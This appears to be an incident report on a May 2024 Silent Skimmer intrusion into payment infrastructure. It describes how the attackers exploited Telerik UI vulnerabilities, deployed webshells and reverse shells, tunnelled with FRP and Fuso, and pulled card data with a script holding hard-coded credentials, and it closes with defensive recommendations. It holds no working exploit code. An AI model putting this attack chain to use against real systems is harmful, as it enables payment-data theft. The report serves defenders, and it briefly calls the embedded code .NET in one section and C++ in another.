Full Report
In May 2024, researchers observed an attack by the Silent Skimmer threat actor, targeting a multinational organization’s payment infrastructure. This attack exploited known vulnerabilities in Telerik UI to gain unauthorized access and deploy various malicious tools, including ...
Analysis Summary
# Incident Report: Silent Skimmer Attack on Payment Infrastructure
## Executive Summary
In May 2024, the Silent Skimmer threat actor targeted a multinational organization's payment infrastructure by exploiting known vulnerabilities in Telerik UI to achieve initial access. The attackers successfully deployed webshells and utilized various custom tools like Fuso and RingQ to establish persistence, move laterally, and ultimately exfiltrate sensitive payment card data. The incident was uncovered through researcher observation and analysis of observed techniques.
## Incident Details
- Discovery Date: November 7, 2024 (Public disclosure date by researchers)
- Incident Date: May 2024
- Affected Organization: Multinational Organization (unspecified)
- Sector: Payment/Financial Infrastructure
- Geography: Unknown
## Timeline of Events
### Initial Access
- Date/Time: May 2024 (Timeframe of first observed attack)
- Vector: Exploitation of known Telerik UI vulnerabilities.
- Details: Attackers exploited CVE-2017-11317 and CVE-2019-18935 to achieve Remote Code Execution (RCE) and file upload capabilities on targeted servers.
### Lateral Movement
- Date/Time: Post initial access
- Vector: Exploitation of established backdoors and communication channels.
- Details: Attackers executed reconnaissance commands (`whoami`, `ipconfig`, `netstat`) to map the environment. They installed web shells and reverse shells for continued access and used tools like Fuso and FRP (for reverse proxying) to bypass network segmentation.
### Data Exfiltration/Impact
- Date/Time: Prior to discovery/reporting
- Vector: Compromised database connection.
- Details: A compiled Python script containing hard-coded credentials connected directly to the payment database, extracted payment information, and saved the data into a local CSV file for eventual exfiltration.
### Detection & Response
- Date/Time: Detected via ongoing security research/monitoring prior to Nov 7, 2024.
- Vector: External researcher observation of campaign activity.
- Details: The specific response actions taken by the targeted organization are not detailed in the provided context, though researcher analysis provided indicators.
## Attack Methodology
- Initial Access: Exploitation of Telerik UI RCE vulnerabilities (CVE-2017-11317, CVE-2019-18935).
- Persistence: Deployment of web shells and reverse shells in strategic directories.
- Privilege Escalation: Assumed through execution permissions granted via RCE, followed by local reconnaissance.
- Defense Evasion: Leveraging PowerShell commands, Base64-encoded payloads, and embedding malicious .NET code within legitimate binaries.
- Credential Access: Use of hard-coded credentials within a Python script to access the database.
- Discovery: Execution of basic system command-line utilities (`whoami`, `ipconfig`, `netstat`).
- Lateral Movement: Establishing network tunnels using Fuso and FRP to access internal infrastructure.
- Collection: Extracting payment information into a CSV file from the target database.
- Exfiltration: Implied through the collection method, utilizing the established network tunnels.
- Impact: Theft of sensitive payment data.
## Impact Assessment
- Financial: Unknown. Direct costs associated with data theft and remediation.
- Data Breach: Sensitive payment information extracted and staged for exfiltration.
- Operational: Direct targeting of payment gateways suggests potential disruption to transaction processing.
- Reputational: High risk due to the compromise of sensitive financial customer data.
## Indicators of Compromise
- Network Indicators (Defanged): Use of reverse proxy tools (e.g., FRP) to expose internal systems.
- File Indicators: Presence of webshells, reverse shells, Fuso loader, RingQ loader, and a compiled Python exfiltration script.
- Behavioral Indicators: Execution of PowerShell commands utilizing Base64 encoding to conceal execution, and network beaconing consistent with reverse shells.
## Response Actions
*(Note: Specific response actions taken by the victim organization are not detailed in the summary material, thus this section is based on standard procedure following such an event type.)*
- Containment: Immediate isolation of affected payment gateway servers and segmentation of the compromised network segments. Revocation of any potentially compromised service accounts.
- Eradication: Removal of all deployed webshells, reverse shells, and custom loaders (Fuso, RingQ). Forensic analysis of binaries suspected of containing embedded C++ code.
- Recovery: Patching of Telerik UI instances against known CVEs. Rebuilding affected systems from trusted images and restoring database access after credential sanitization.
## Lessons Learned
- Legacy Vulnerability Exploitation: Known, older CVEs in third-party components (Telerik UI) remain a critical threat vector if patches are not prioritized.
- Defense Evasion Sophistication: Attackers employed advanced techniques (code embedding in binaries, heavy encoding) to bypass standard static analysis tools.
- Secrets Management: Hard-coded database credentials within an application present a high-value target once initial access is gained.
## Recommendations
- Patch Management: Immediately audit and apply patches for all identified application server software, especially components like Telerik UI, prioritizing vulnerabilities older than 6 months.
- Network Hardening: Review firewall and proxy configurations to strictly limit outbound connections initiated from payment processing zones to prevent the successful deployment and use of reverse proxy tools (FRP).
- Credential Auditing: Implement secrets management tools to eliminate hard-coded credentials in application code, utilizing managed identity or vault solutions instead.
- Endpoint Detection: Deploy advanced Endpoint Detection and Response (EDR) solutions capable of monitoring PowerShell command-line arguments and detecting anomalous process injection often used in obfuscation attempts.